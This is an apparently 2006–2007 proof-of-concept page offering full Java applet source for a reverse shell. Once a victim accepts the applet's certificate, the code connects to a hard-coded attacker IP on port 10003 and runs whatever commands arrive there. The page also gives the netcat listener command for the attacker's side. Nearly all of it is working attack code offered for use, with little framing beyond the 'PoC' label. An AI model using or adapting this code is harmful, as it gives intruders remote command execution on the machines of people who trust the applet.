Proof-of-Concept

Links

 ../back
 mainpage
 Basic PoC



Description

This PoC exec an reverse shell from the victim, if he accepts the certificate.
In this example, the applet try to connect to the ip of the invader on port 10003 and offers a remoteshell.
As server you could use netcat:

  	  nc -vv -l -p 10003



Sourcecode:
import java.io.*;
import java.net.Socket;
import java.util.*;
import java.util.regex.*;
import java.applet.Applet;

public class poc extends Applet{
	/**
	 * Author: daniel baier alias duddits
	 * Licens: GPL
	 * Requirements: JRE 1.5 for running and the JDK 1.5 for compiling or higher
	 * Version: 0.1 alpha release
	 */

	public String cd(String start, File currentDir) {
		File fullPath = new File(currentDir.getAbsolutePath());
		String sparent = fullPath.getAbsoluteFile().toString();
		return sparent + "/" + start;

		}

	@SuppressWarnings("unchecked")
	public void init() {
		poc rs = new poc();
		PrintWriter out;
		try {
			Socket clientSocket = new Socket("192.168.5.222",10003);
			out = new PrintWriter(clientSocket.getOutputStream(), true);
			out.println("\tJRS 0.1 alpha release\n\tdeveloped by duddits alias daniel baier");
			boolean run = true;
			String s;
			BufferedReader br = new BufferedReader(new InputStreamReader(clientSocket.getInputStream()));
			String startort = "/";
			while (run) {
				String z1;
				File f = new File(startort);
				out.println(f.getAbsolutePath() + "> ");
				s = br.readLine();
				z1 = s;
				Pattern pcd = Pattern.compile("^cd\\s");
				Matcher mcd = pcd.matcher(z1);
				String[] teile1 = pcd.split(z1);
				if (s.equals("exit")) {
					run = false;
				}else if (s.equals(null) || s.equals("cmd") || s.equals("")) {

				} else if(mcd.find()){
					try {
						String cds = rs.cd(teile1[1], new File(startort));
						startort = cds;
						} catch (Exception verz) {
						out.println("Path " + teile1[1]
						+ " not found.");
						}

				}else {

					String z2;


					z2 = s;
					Pattern pstring = Pattern.compile("\\s");
					String[] plist = pstring.split(z2);

					try {

						LinkedList slist = new LinkedList();
						for (int i = 0; i < plist.length; i++) {
							slist.add(plist[i]);
						}

						ProcessBuilder builder = new ProcessBuilder(slist);
						builder.directory(new File(startort));
						Process p = builder.start();
						Scanner se = new Scanner(p.getInputStream());
						if (!se.hasNext()) {
							Scanner sa = new Scanner(p.getErrorStream());
							while (sa.hasNext()) {
								out.println(sa.nextLine());
							}
						}
						while (se.hasNext()) {
							out.println(se.nextLine());
						}


					} catch (Exception err) {
						out.println(f.getAbsolutePath() + "> Command "
								+ s + " failed!");
						out.println(f.getAbsolutePath() +"> Please try cmd /c "+ s+" or bash -c " +s+" if this command is an shell buildin.");
					}

				}
			}

			if(!clientSocket.isConnected()){
				run = false;
				out.flush();
				out.close();
			}

		} catch (Exception io) {
			//System.err.println("Connection refused by peer");
		}

	}

}



Copyright © 2006-2007 Daniel Baier: Alle Rechte vorbehalten